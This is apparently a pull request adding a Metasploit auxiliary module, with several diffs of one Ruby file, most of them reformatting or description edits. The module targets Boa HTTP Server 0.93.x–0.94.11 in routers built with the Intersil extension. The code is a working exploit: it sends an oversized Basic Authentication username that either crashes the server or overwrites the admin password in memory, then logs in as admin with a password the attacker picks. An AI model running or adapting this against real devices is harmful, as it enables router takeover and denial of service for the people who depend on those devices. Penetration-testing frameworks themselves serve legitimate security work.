### PR TITLE
Boa HTTPd Basic Authentication Overflow

### DIFF
--- a/modules/auxiliary/dos/http/boa_auth_dos.rb
+++ b/modules/auxiliary/dos/http/boa_auth_dos.rb
@@ -13,87 +13,86 @@ require 'msf/core'
 
 class Metasploit3 < Msf::Auxiliary
 
-	include Msf::Exploit::Remote::HttpClient
-        include Msf::Exploit::Remote::Tcp
-	include Msf::Auxiliary::Dos
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Dos
 
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Boa HTTPd Basic Authentication Overflow',
-			'Description'    => %q{
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name'           => 'Boa HTTPd Basic Authentication Overflow',
+                      'Description'    => %q{
 					The Intersil extention in the Boa HTTP Server 0.93.x
 				allows denial of service or possibly authentication bypass
 				via a Basic Authentication header with a user string greater than 127 characters. You must set
 				the request URI to the directory that requires basic authentication.
 			},
-			'Author'         =>
-				[
-					'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', #original discoverer
-					'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', #original discoverer
-					'Max Dietz <maxwell.r.dietz[at]gmail.com>' #metasploit module
-				],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
-			'References'     =>
-				[
-					[ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html'],
-				],
-			'DisclosureDate' => 'Sep 10 2007'))
-
-		register_options(
-			[
-				Opt::RPORT(80),
-				OptString.new('URI', [ true,  "The request URI", '/']),
-				OptString.new('PASSWORD', [true, 'The password to set (if possible)', 'pass'])
-			], self.class)
-	end
-
-        def check
-          begin
-		connect
-		sock.put('GET / HTTP/1.0\r\n\r\n')
-		resp = sock.get_once
-		disconnect
-
-		if (resp and (m = resp.match(/Server: Boa\/(.*)/)))
-                  print_status("Boa Version Detected: #{m[1]}")
-                  return Exploit::CheckCode::Safe if (m[1][0]>0) # boa server wrong version
-                  return Exploit::CheckCode::Safe if (m[1][3]>4)
-                  return Exploit::CheckCode::Vulnerable
-                else
-                  print_status("Not a Boa Server!")
-                  return Exploit::CheckCode::Safe # not a boa server
-                end
-          rescue Rex::ConnectionRefused
-            print_error("Connection refused by server.")
-            return Exploit::CheckCode::Safe
-          end
-	end
-	def run
-          if check == Exploit::CheckCode::Vulnerable
-            datastore['BasicAuthUser'] = Rex::Text.rand_text_alpha(127)
-            datastore['BasicAuthPass'] = datastore['PASSWORD']
-            res = send_request_cgi({
-                                     'uri'=> datastore['URI'],
-                                     'method'=>'GET'
-                                   })
-            if (res != nil)
-              print_status("Server still operational... checking to see if password has been overwritten.")
-              datastore['BasicAuthUser'] = 'admin'
-              res = send_request_cgi({
-                                       'uri'=>datastore['URI'],
-                                       'method'=>'GET'
-                                     })
-              if (res.code == 200)
-                print_status("Access successful with admin:#{datastore['PASSWORD']}")
-              elsif (res.code != 403)
-                print_status("Access not forbidden, but another error has occured: Code #{res.code} encountered")
-              else
-                print_status("Access forbidden, this module has failed.")
-              end
-            else
-              print_status("Denial of Service has succeeded.")
-            end
-          end		
-	end
+                      'Author'         =>
+                      [
+                       'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', #original discoverer
+                       'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', #original discoverer
+                       'Max Dietz <maxwell.r.dietz[at]gmail.com>' #metasploit module
+                      ],
+                      'License'        => MSF_LICENSE,
+                      'Version'        => '$Revision$',
+                      'References'     =>
+                      [
+                       [ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html'],
+                      ],
+                      'DisclosureDate' => 'Sep 10 2007'))
+    
+    register_options(
+                     [
+                      Opt::RPORT(80),
+                      OptString.new('URI', [ true,  "The request URI", '/']),
+                      OptString.new('PASSWORD', [true, 'The password to set (if possible)', 'pass'])
+                     ], self.class)
+  end
+  
+  def check
+    begin
+      connect
+      sock.put('GET / HTTP/1.0\r\n\r\n')
+      resp = sock.get_once
+      disconnect
+      if (resp and (m = resp.match(/Server: Boa\/(.*)/)))
+        print_status("Boa Version Detected: #{m[1]}")
+        return Exploit::CheckCode::Safe if (m[1][0]>0) # boa server wrong version
+        return Exploit::CheckCode::Safe if (m[1][3]>4)
+        return Exploit::CheckCode::Vulnerable
+      else
+        print_status("Not a Boa Server!")
+        return Exploit::CheckCode::Safe # not a boa server
+      end
+    rescue Rex::ConnectionRefused
+      print_error("Connection refused by server.")
+      return Exploit::CheckCode::Safe
+    end
+  end
+  def run
+    if check == Exploit::CheckCode::Vulnerable
+      datastore['BasicAuthUser'] = Rex::Text.rand_text_alpha(127)
+      datastore['BasicAuthPass'] = datastore['PASSWORD']
+      res = send_request_cgi({
+                               'uri'=> datastore['URI'],
+                               'method'=>'GET'
+                             })
+      if (res != nil)
+        print_status("Server still operational... checking to see if password has been overwritten.")
+        datastore['BasicAuthUser'] = 'admin'
+        res = send_request_cgi({
+                                 'uri'=>datastore['URI'],
+                                 'method'=>'GET'
+                               })
+        if (res.code == 200)
+          print_status("Access successful with admin:#{datastore['PASSWORD']}")
+        elsif (res.code != 403)
+          print_status("Access not forbidden, but another error has occured: Code #{res.code} encountered")
+        else
+          print_status("Access forbidden, this module has failed.")
+        end
+      else
+        print_status("Denial of Service has succeeded.")
+      end
+    end		
+  end
 end

--- a/modules/auxiliary/dos/http/boa_auth_dos.rb
+++ b/modules/auxiliary/dos/http/boa_auth_dos.rb
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
     super(update_info(info,
                       'Name'           => 'Boa HTTPd Basic Authentication Overflow',
                       'Description'    => %q{
-					The Intersil extention in the Boa HTTP Server 0.93.x
+					The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11
 				allows denial of service or possibly authentication bypass
 				via a Basic Authentication header with a user string greater than 127 characters. You must set
 				the request URI to the directory that requires basic authentication.

--- a/modules/auxiliary/dos/http/boa_auth_dos.rb
+++ b/modules/auxiliary/dos/http/boa_auth_dos.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
 			sock.put(sploit)
 			disconnect
 
-			print_status("Server not crashed.  Either the password for 'admin' has been changed or this server is not vulnerable")
+			print_status("Server not crashed.  Either the attack was successful and the password for 'admin' has been changed to #{datastore['Password']} or this server is not vulnerable.")
 
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 			print_status("Unable to connect to #{rhost}:#{rport}.")

--- a/modules/auxiliary/dos/http/boa_auth_dos.rb
+++ b/modules/auxiliary/dos/http/boa_auth_dos.rb
@@ -21,8 +21,8 @@ class Metasploit3 < Msf::Auxiliary
 		super(update_info(info,
 			'Name'           => 'Boa HTTPd Basic Authentication Overflow',
 			'Description'    => %q{
-					The Intersil extention in the Boa HTTP Server 0.93.15 through 2.0.64, and 2.2.x
-				through 2.2.19 allows denial of service or possibly authentication bypass
+					The Intersil extention in the Boa HTTP Server 0.93.x
+				allows denial of service or possibly authentication bypass
 				via a Basic Authentication header with a user string greater than 127 characters. You must set
 				the request URI to the directory that requires basic authentication.
 			},

--- a/modules/auxiliary/dos/http/boa_auth_dos.rb
+++ b/modules/auxiliary/dos/http/boa_auth_dos.rb
@@ -13,85 +13,87 @@ require 'msf/core'
 
 class Metasploit3 < Msf::Auxiliary
 
-  include Msf::Exploit::Remote::HttpClient
-  include Msf::Auxiliary::Dos
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Dos
 
-  def initialize(info = {})
-    super(update_info(info,
-                      'Name'           => 'Boa HTTPd Basic Authentication Overflow',
-                      'Description'    => %q{
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'		=> 'Boa HTTPd Basic Authentication Overflow',
+			'Description'	=>
+				%q{
 					The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11
-				allows denial of service or possibly authentication bypass
-				via a Basic Authentication header with a user string greater than 127 characters. You must set
-				the request URI to the directory that requires basic authentication.
-			},
-                      'Author'         =>
-                      [
-                       'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', #original discoverer
-                       'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', #original discoverer
-                       'Max Dietz <maxwell.r.dietz[at]gmail.com>' #metasploit module
-                      ],
-                      'License'        => MSF_LICENSE,
-                      'Version'        => '$Revision$',
-                      'References'     =>
-                      [
-                       [ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html'],
-                      ],
-                      'DisclosureDate' => 'Sep 10 2007'))
-    
-    register_options(
-                     [
-                      Opt::RPORT(80),
-                      OptString.new('URI', [ true,  "The request URI", '/']),
-                      OptString.new('PASSWORD', [true, 'The password to set (if possible)', 'pass'])
-                     ], self.class)
-  end
-  
-  def check
-    begin
-      res = send_request_cgi({
-                               'uri'=>'/',
-                               'method'=>'GET'
-                             })
-      if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
-        print_status("Boa Version Detected: #{m[1]}")
-        return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
-        return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
-        return Exploit::CheckCode::Vulnerable
-      else
-        print_status("Not a Boa Server!")
-        return Exploit::CheckCode::Safe # not a boa server
-      end
-    rescue Rex::ConnectionRefused
-      print_error("Connection refused by server.")
-      return Exploit::CheckCode::Safe
-    end
-  end
-  def run
-    if check == Exploit::CheckCode::Vulnerable
-      datastore['BasicAuthUser'] = Rex::Text.rand_text_alpha(127)
-      datastore['BasicAuthPass'] = datastore['PASSWORD']
-      res = send_request_cgi({
-                               'uri'=> datastore['URI'],
-                               'method'=>'GET'
-                             })
-      if (res != nil)
-        print_status("Server still operational... checking to see if password has been overwritten.")
-        datastore['BasicAuthUser'] = 'admin'
-        res = send_request_cgi({
-                                 'uri'=>datastore['URI'],
-                                 'method'=>'GET'
-                               })
-        if (res.code == 200)
-          print_status("Access successful with admin:#{datastore['PASSWORD']}")
-        elsif (res.code != 401)
-          print_status("Access not forbidden, but another error has occured: Code #{res.code} encountered")
-        else
-          print_status("Access forbidden, this module has failed.")
-        end
-      else
-        print_status("Denial of Service has succeeded.")
-      end
-    end		
-  end
+					allows denial of service or possibly authentication bypass
+					via a Basic Authentication header with a user string greater than 127 characters. You must set
+					the request URI to the directory that requires basic authentication.
+				},
+			'Author'	=>
+				[
+					'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', #original discoverer
+					'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', #original discoverer
+					'Max Dietz <maxwell.r.dietz[at]gmail.com>' #metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html'],
+				],
+			'DisclosureDate' => 'Sep 10 2007'))
+
+		register_options(
+			[
+				Opt::RPORT(80),
+				OptString.new('URI', [ true,  "The request URI", '/']),
+				OptString.new('PASSWORD', [true, 'The password to set (if possible)', 'pass'])
+			], self.class)
+	end
+
+	def check
+		begin
+			res = send_request_cgi({
+				'uri'=>'/',
+				'method'=>'GET'
+			})
+			if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
+				print_status("Boa Version Detected: #{m[1]}")
+				return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
+				return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
+				return Exploit::CheckCode::Vulnerable
+			else
+				print_status("Not a Boa Server!")
+				return Exploit::CheckCode::Safe # not a boa server
+			end
+		rescue Rex::ConnectionRefused
+			print_error("Connection refused by server.")
+			return Exploit::CheckCode::Safe
+		end
+	end
+
+	def run
+		if check == Exploit::CheckCode::Vulnerable
+			datastore['BasicAuthUser'] = Rex::Text.rand_text_alpha(127)
+			datastore['BasicAuthPass'] = datastore['PASSWORD']
+			res = send_request_cgi({
+				'uri'=> datastore['URI'],
+				'method'=>'GET'
+			})
+			if (res != nil)
+				print_status("Server still operational... checking to see if password has been overwritten.")
+				datastore['BasicAuthUser'] = 'admin'
+				res = send_request_cgi({
+					'uri'=>datastore['URI'],
+					'method'=>'GET'
+				})
+				if (res.code == 200)
+					print_status("Access successful with admin:#{datastore['PASSWORD']}")
+				elsif (res.code != 401)
+					print_status("Access not forbidden, but another error has occured: Code #{res.code} encountered")
+				else
+					print_status("Access forbidden, this module has failed.")
+				end
+			else
+				print_status("Denial of Service has succeeded.")
+			end
+		end
+	end
 end

--- a/modules/auxiliary/dos/http/boa_auth_dos.rb
+++ b/modules/auxiliary/dos/http/boa_auth_dos.rb
@@ -1,0 +1,67 @@
+##
+# $Id: boa_auth_dos.rb 15014 2012-06-06 15:13:11Z rapid7 $
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+	Rank = GoodRanking
+
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Auxiliary::Dos
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Boa HTTPd Basic Authentication Overflow',
+			'Description'    => %q{
+					The Intersil extention in the Boa HTTP Server 0.93.15 through 2.0.64, and 2.2.x
+				through 2.2.19 allows denial of service or possibly authentication bypass
+				via a Basic Authentication header with a user string greater than 127 characters. You must set
+				the request URI to the directory that requires basic authentication.
+			},
+			'Author'         =>
+				[
+					'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', #original discoverer
+					'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', #original discoverer
+					'Max Dietz <maxwell.r.dietz[at]gmail.com>' #metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html'],
+				],
+			'DisclosureDate' => 'Sep 10 2007'))
+
+		register_options(
+			[
+				Opt::RPORT(80),
+				OptString.new('URI', [ true,  "The request URI", '/']),
+				OptString.new('Password', [true, 'The password to set (if possible)', 'pass'])
+			], self.class)
+	end
+
+	def run
+		connect
+		print_status("Sending packet to #{rhost}:#{rport}")
+		auth = "X" * 127
+		auth << ":"
+		auth << datastore['Password']
+
+		sploit = "GET "
+		sploit << datastore['URI']
+		sploit << " HTTP/1.1\r\nAuthorization: Basic\r\n"
+		sploit << Base64.encode64(auth)
+		sploit << "\r\n\r\n"
+
+		sock.put(sploit)
+		disconnect
+	end
+end


### PR DESCRIPTION
Boa HTTP Server 0.93.x - 0.94.11 built with Intersil (i.e. common routers) allows denial of service or possibly authentication bypass via a Basic Authentication header with a user string greater than 127 characters. You must set the request URI to the directory that requires basic authentication.  Depending on the version of the server either the administrator password will be overwritten in memory or the web server will be shut down.
